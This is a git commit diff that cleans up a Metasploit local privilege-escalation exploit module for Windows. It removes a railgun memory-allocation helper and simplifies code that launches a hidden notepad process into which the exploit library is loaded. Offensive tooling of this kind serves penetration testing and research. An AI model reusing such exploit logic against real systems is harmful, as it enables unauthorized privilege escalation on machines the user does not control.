Fix module according to @wchen-r7 feedback

2013-06-28 20:44:42 -05:00 · 2013-06-28 20:44:42 -05:00 · 3ab948209b
parent 00416f3430
commit 3ab948209b
1 changed files with 1 additions and 26 deletions
--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@ -14,7 +14,6 @@ require 'msf/core/post/windows/process'
 class Metasploit3 < Msf::Exploit::Local
 	Rank = AverageRanking

-	include Msf::Post::Common
 	include Msf::Post::File
 	include Msf::Post::Windows::Priv
 	include Msf::Post::Windows::Process
@ -73,32 +72,11 @@ class Metasploit3 < Msf::Exploit::Local
 		end
 	end

-	def add_railgun_functions
-		session.railgun.add_function(
-			'ntdll',
-			'NtAllocateVirtualMemory',
-			'DWORD',
-			[
-				["DWORD", "ProcessHandle", "in"],
-				["PBLOB", "BaseAddress", "inout"],
-				["PDWORD", "ZeroBits", "in"],
-				["PBLOB", "RegionSize", "inout"],
-				["DWORD", "AllocationType", "in"],
-				["DWORD", "Protect", "in"]
-			])
-	end
-
-	def junk(n=4)
-		return rand_text_alpha(n).unpack("V").first
-	end
-
 	def create_proc()
-		windir = client.fs.file.expand_path("%windir%")
+		windir = expand_path("%windir%")
 		# Select path of executable to run depending the architecture
 		if sysinfo['Architecture'] =~ /x86/
 			cmd = "#{windir}\\System32\\notepad.exe"
-		else
-			cmd = "#{windir}\\Sysnative\\notepad.exe"
 		end
 		# run hidden
 		proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
@ -128,9 +106,6 @@ class Metasploit3 < Msf::Exploit::Local
 			end
 		end

-		vprint_status("Adding the railgun stuff...")
-		add_railgun_functions
-
 		print_status("Trying to load the exploit and executing...")

 		session.core.load_library({